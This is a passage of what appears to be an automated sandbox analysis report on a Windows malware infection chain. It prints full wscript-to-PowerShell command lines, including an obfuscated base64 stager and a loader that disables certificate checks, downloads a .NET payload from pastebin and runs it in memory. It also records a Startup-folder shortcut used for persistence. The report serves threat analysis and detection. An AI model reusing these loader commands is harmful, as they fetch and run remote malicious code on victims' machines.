('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E700BD pushad ; iretd 2_2_00007FF848E700C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E700BD pushad ; iretd 5_2_00007FF848E700C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595E410 pushfd ; iretd 7_2_0595E411
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595D7E3 pushad ; ret 7_2_0595D7E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595E373 push esp; iretd 7_2_0595E379
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848E80028 push eax; ret 12_2_00007FF848E80029
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848E85E9D push eax; retf 14_2_00007FF848E85F71
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, XYfrwW5V593UMwIH2.csHigh entropy of concatenated method names: 'ItHc8NJ5k7ZtzJKAZ', 'Eb3vd67ceIchdOkiX', '_3D7Gn9Kw6yfIxqRJO', '_5PXS3q04AZHSMmy6OFu2FfkiseYHLTZaigLhKzo1MISQheUH7CKFshjb1Cle4Ob97dVQRqRl2zqUmzSPZIGc', 'YCJAqWvH64WVSp9bvnHWYpBmNlhqhjnJpzM3Ftk7UqkLNKMkoECQYNM5JSwJSh6HukHqUuEuIzNEPZa1RKzN', 'QOeu5YGf32YHKzOhIM7IjkTSIve1IOEUx7vKMBlOMlJ922GH0sxU64s0v2oqxWevKaF2pUM8HDddFZoLwgQb', 'uCwuP8WRzNLTedkvO99lo42mJKnDD458EQrzDhcOa0miJM9w4uZah6dgk1s02LQ2edt5aEUcKpDizzZrHJcb', 'EXTWBLsDIXcBtJSyg851l7mYfaoZr50H491p1hCPqEy0Hw8vAz9MCfib9tnU7QI6oP8c5pxIr2TSzW3OE46s', 'ry76lfycDTEEJ7vgzezcZosD6iKpXYC8kmCYR1tqtymNiXIBkUcAcdEvthBeOCY0uOPM32WKJLxlTdEntMGe', 'ZdAa0PDognTctZ8IYw8qxy32aDx5SN7EpMPlfExp3mJxT9KjdqixnJg0NyvccsWDcvV3M01sonz21Wvfbggm'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.csHigh entropy of concatenated method names: 'J8i9LR7WPfUm6lW25HtbTXzahDWe8rK3sa7vLQ2sKx0fbQ564', '_8tVhzDzSvnMENa6xZNBF8DTzRwfmWBnGtf4sZelYENLEh5hGD', 'nDSUS8CZiikAT0XcFHNbtJ36kUrMYs0HQ9hW4jLocFKFFxfxS', 'qnE5uWusqQvQ7TwQuk2yvfLox4IBSWyIEdNEtzOq4fGfzjOZ9'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, EcmUVfa1L5XqkaIH6HbHkBiwj0eT9cf.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'UMCPdJLg9iSRyhqP5FvuxVkzjCVrRuyyeTIDEqd4FJjUwsod0', 'SzrlcrGfy2u2qC7Iqs28vw5W46QgvrmeOwbwZztYWZvBbRvY7', 'EZPZj8foG2zP034kJM2GoBglg1xdz0Pq8u5yuHkqBX4wdflVh', 'kAPcN0kjRmrGe6pWclWkSwmbxPQiNj5tyZ7bLTzNcyYkWgC6D'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.csHigh entropy of concatenated method names: '_9B22Czp8skaw03xiR', 'hxSg8DMICskDTdoCS', 'MoemDsyMcPqZkQmFl', 'o0vipdyf1OR0ObXGC', 'UNgWlPJWKMnqjzLcC', 'oxN7UbaO4yjGdpcJ8', 'bXlppUX8DSBKrkOdu', 'dxUoO4xhcUzx8oO5J', '_8XfpFbokqCYleOWEk', 'NW8vqva4N9hXuPWGQ'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, uZaXYBDZ6KheGbUfWnzSAabcEeeKPaY.csHigh entropy of concatenated method names: 'br5eXuRVodgprDprWkCH3hlNi0uAyjq', 'huGMrIY793DeOvfpUaR7E0efSazDjry', 'RdsVqV7T3SuKZEp0FRpelYIHFByhBb1', '_51hXy89Hpv2exsGmU8getVVsb6IpCQP', 'pHQarxZg3Y7dOzlBoBfai8Q9GFjrfT5PP4htnu9UgYzBAi3pQ', 'imMUI5fEHwIG5o6gCoRWHNMco0qKWmqbDJhm3pQMQOnqk8L8u', 'zbd7zSMSH9TA8ISQUMqBkYhQC3jzXAQmMSyJMHp5ossUoDW7s', '_4dhtSd1ohqWIJpgU39W8XwMoqyBHktflfxVBR5ojWOWpBGv3D', 'IfH9jiTSaG8rVzVGVL8V2H6HtyEd0NEym60n0lZjzvct0N3RD', 'XRQJ25mbptn811DUe7igV0KPzx2FDoOzCjmNLBOHQ13uVkctP'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 8ly6sYOYGHY603xNL.csHigh entropy of concatenated method names: 'sLYNuXqXwrGcoibVr', 'bNKycKIBtmRtxmPs4RSl2ywEoKHqMVzgDxon8o5p0gPrzRtRlCV71qInEpOvTWheAbC', 'SB8FbkxQv2FsTOH98lOMb38jnVL1w7Mu1ikdfVSSSXlpHBXvZIvAIpFwtv3RAIYQYAG', 'bAO2WcjBwkzl7q5i22aj0t67Tcg0WiSBoRp0QkKJOZDpTru1dRbblJOZAOnEh40zixe', 'JBfwxwoHWOChqJPbCdnaiPi4roExDsqERoIiK4YyxT8VqRIdW9T6SaFyGLaP9WRG46c'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.csHigh entropy of concatenated method names: 'hqwMgvdTj6DxGmf4z', 'ZsPuYsgyWtYvjRnlJ', 'yKhQHew7k4ctpljue', 'YjvlW8vjJsH2uipxy', 'PdgEfFB0qqQQuh6Wf', 'RqccMv1T262c0QvEh', 'aRPJytsm2eLmOdLpe', 'i3jteoSI0etjX9adc', 'wU70MvasodcIojkyZ', 'wF3KJ9B1qqB8BORea'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, md2LJQvBQNx1MN7eq.csHigh entropy of concatenated method names: 'B7oHbSdkSekEZCEpe', 'rkBmSWmP8fsbiCbB8', 'XmivMOV2gPJWWW1qN', 'G6MlGij3qlLcy1gj3', '_7SGKsw3blHvncLZka', 'E4aHUO5Gp37AeSChb', '_4xgo7J0swz0RYjSo3', '_3X2jrP8IPinsurV8E', 'WA2IheLBxfG6dg0TV', 'lZ5NFpdf7RJUPYP9P'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, Hf0jRXweJYx23320j.csHigh entropy of concatenated method names: '_92sGAFfeSeEOY0xu6', 'JX0Nr18GmvFpa7SKqcaScZseZm6mdUQK5p66QOl0g6Rqwj8U9pcCUXkITLCnQeyAqKt', 'J7pLtFgW2B7Ht6AwgpuqxB7EpezdukgcFx3kKRqjlpCjOzHcUpAc62NRYcP4O56YjHo', 'U9w54ISTyQUq3K51Mlqmk81AQ2JHvSQPmNKJswg4Rf0K54SYDqacwHXnXqsLNFCzH3h', 'jVigYWjUotvmqlIwSfewdgstGGArnunYFuMVYkpUEo59e5p4xzOBnmBLljTx63FIluC'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csHigh entropy of concatenated method names: 'VID28M9oZZYEM2JrUREYVz2QQT0zJ32', '_58URoK9IgBYP2nb12hCOuf6pMkyIsc5', 'BVMJMIgQWUeVzuViyxK09rU9HfDXmUz', 'd9qDZrxHmQPLwHS8KYjnUT3vdWW0rTY', 'ZS7BS6os0ql3YUQhAsMbKa7E89PZeUs', 'apAgjHd7IxfhBGZoC', 'N1W8xawn9mgdDSljN', 'oF3A0sgfCWW7RXkXV', 'miWvrTPhqtSVLdT8P', 'iSBXZTAL97lagi6Lu'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, XYfrwW5V593UMwIH2.csHigh entropy of concatenated method names: 'ItHc8NJ5k7ZtzJKAZ', 'Eb3vd67ceIchdOkiX', '_3D7Gn9Kw6yfIxqRJO', '_5PXS3q04AZHSMmy6OFu2FfkiseYHLTZaigLhKzo1MISQheUH7CKFshjb1Cle4Ob97dVQRqRl2zqUmzSPZIGc', 'YCJAqWvH64WVSp9bvnHWYpBmNlhqhjnJpzM3Ftk7UqkLNKMkoECQYNM5JSwJSh6HukHqUuEuIzNEPZa1RKzN', 'QOeu5YGf32YHKzOhIM7IjkTSIve1IOEUx7vKMBlOMlJ922GH0sxU64s0v2oqxWevKaF2pUM8HDddFZoLwgQb', 'uCwuP8WRzNLTedkvO99lo42mJKnDD458EQrzDhcOa0miJM9w4uZah6dgk1s02LQ2edt5aEUcKpDizzZrHJcb', 'EXTWBLsDIXcBtJSyg851l7mYfaoZr50H491p1hCPqEy0Hw8vAz9MCfib9tnU7QI6oP8c5pxIr2TSzW3OE46s', 'ry76lfycDTEEJ7vgzezcZosD6iKpXYC8kmCYR1tqtymNiXIBkUcAcdEvthBeOCY0uOPM32WKJLxlTdEntMGe', 'ZdAa0PDognTctZ8IYw8qxy32aDx5SN7EpMPlfExp3mJxT9KjdqixnJg0NyvccsWDcvV3M01sonz21Wvfbggm'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.csHigh entropy of concatenated method names: 'J8i9LR7WPfUm6lW25HtbTXzahDWe8rK3sa7vLQ2sKx0fbQ564', '_8tVhzDzSvnMENa6xZNBF8DTzRwfmWBnGtf4sZelYENLEh5hGD', 'nDSUS8CZiikAT0XcFHNbtJ36kUrMYs0HQ9hW4jLocFKFFxfxS', 'qnE5uWusqQvQ7TwQuk2yvfLox4IBSWyIEdNEtzOq4fGfzjOZ9'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, EcmUVfa1L5XqkaIH6HbHkBiwj0eT9cf.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'UMCPdJLg9iSRyhqP5FvuxVkzjCVrRuyyeTIDEqd4FJjUwsod0', 'SzrlcrGfy2u2qC7Iqs28vw5W46QgvrmeOwbwZztYWZvBbRvY7', 'EZPZj8foG2zP034kJM2GoBglg1xdz0Pq8u5yuHkqBX4wdflVh', 'kAPcN0kjRmrGe6pWclWkSwmbxPQiNj5tyZ7bLTzNcyYkWgC6D'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.csHigh entropy of concatenated method names: '_9B22Czp8skaw03xiR', 'hxSg8DMICskDTdoCS', 'MoemDsyMcPqZkQmFl', 'o0vipdyf1OR0ObXGC', 'UNgWlPJWKMnqjzLcC', 'oxN7UbaO4yjGdpcJ8', 'bXlppUX8DSBKrkOdu', 'dxUoO4xhcUzx8oO5J', '_8XfpFbokqCYleOWEk', 'NW8vqva4N9hXuPWGQ'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, uZaXYBDZ6KheGbUfWnzSAabcEeeKPaY.csHigh entropy of concatenated method names: 'br5eXuRVodgprDprWkCH3hlNi0uAyjq', 'huGMrIY793DeOvfpUaR7E0efSazDjry', 'RdsVqV7T3SuKZEp0FRpelYIHFByhBb1', '_51hXy89Hpv2exsGmU8getVVsb6IpCQP', 'pHQarxZg3Y7dOzlBoBfai8Q9GFjrfT5PP4htnu9UgYzBAi3pQ', 'imMUI5fEHwIG5o6gCoRWHNMco0qKWmqbDJhm3pQMQOnqk8L8u', 'zbd7zSMSH9TA8ISQUMqBkYhQC3jzXAQmMSyJMHp5ossUoDW7s', '_4dhtSd1ohqWIJpgU39W8XwMoqyBHktflfxVBR5ojWOWpBGv3D', 'IfH9jiTSaG8rVzVGVL8V2H6HtyEd0NEym60n0lZjzvct0N3RD', 'XRQJ25mbptn811DUe7igV0KPzx2FDoOzCjmNLBOHQ13uVkctP'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 8ly6sYOYGHY603xNL.csHigh entropy of concatenated method names: 'sLYNuXqXwrGcoibVr', 'bNKycKIBtmRtxmPs4RSl2ywEoKHqMVzgDxon8o5p0gPrzRtRlCV71qInEpOvTWheAbC', 'SB8FbkxQv2FsTOH98lOMb38jnVL1w7Mu1ikdfVSSSXlpHBXvZIvAIpFwtv3RAIYQYAG', 'bAO2WcjBwkzl7q5i22aj0t67Tcg0WiSBoRp0QkKJOZDpTru1dRbblJOZAOnEh40zixe', 'JBfwxwoHWOChqJPbCdnaiPi4roExDsqERoIiK4YyxT8VqRIdW9T6SaFyGLaP9WRG46c'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.csHigh entropy of concatenated method names: 'hqwMgvdTj6DxGmf4z', 'ZsPuYsgyWtYvjRnlJ', 'yKhQHew7k4ctpljue', 'YjvlW8vjJsH2uipxy', 'PdgEfFB0qqQQuh6Wf', 'RqccMv1T262c0QvEh', 'aRPJytsm2eLmOdLpe', 'i3jteoSI0etjX9adc', 'wU70MvasodcIojkyZ', 'wF3KJ9B1qqB8BORea'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, md2LJQvBQNx1MN7eq.csHigh entropy of concatenated method names: 'B7oHbSdkSekEZCEpe', 'rkBmSWmP8fsbiCbB8', 'XmivMOV2gPJWWW1qN', 'G6MlGij3qlLcy1gj3', '_7SGKsw3blHvncLZka', 'E4aHUO5Gp37AeSChb', '_4xgo7J0swz0RYjSo3', '_3X2jrP8IPinsurV8E', 'WA2IheLBxfG6dg0TV', 'lZ5NFpdf7RJUPYP9P'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, Hf0jRXweJYx23320j.csHigh entropy of concatenated method names: '_92sGAFfeSeEOY0xu6', 'JX0Nr18GmvFpa7SKqcaScZseZm6mdUQK5p66QOl0g6Rqwj8U9pcCUXkITLCnQeyAqKt', 'J7pLtFgW2B7Ht6AwgpuqxB7EpezdukgcFx3kKRqjlpCjOzHcUpAc62NRYcP4O56YjHo', 'U9w54ISTyQUq3K51Mlqmk81AQ2JHvSQPmNKJswg4Rf0K54SYDqacwHXnXqsLNFCzH3h', 'jVigYWjUotvmqlIwSfewdgstGGArnunYFuMVYkpUEo59e5p4xzOBnmBLljTx63FIluC'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csHigh entropy of concatenated method names: 'VID28M9oZZYEM2JrUREYVz2QQT0zJ32', '_58URoK9IgBYP2nb12hCOuf6pMkyIsc5', 'BVMJMIgQWUeVzuViyxK09rU9HfDXmUz', 'd9qDZrxHmQPLwHS8KYjnUT3vdWW0rTY', 'ZS7BS6os0ql3YUQhAsMbKa7E89PZeUs', 'apAgjHd7IxfhBGZoC', 'N1W8xawn9mgdDSljN', 'oF3A0sgfCWW7RXkXV', 'miWvrTPhqtSVLdT8P', 'iSBXZTAL97lagi6Lu'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnkJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnkJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
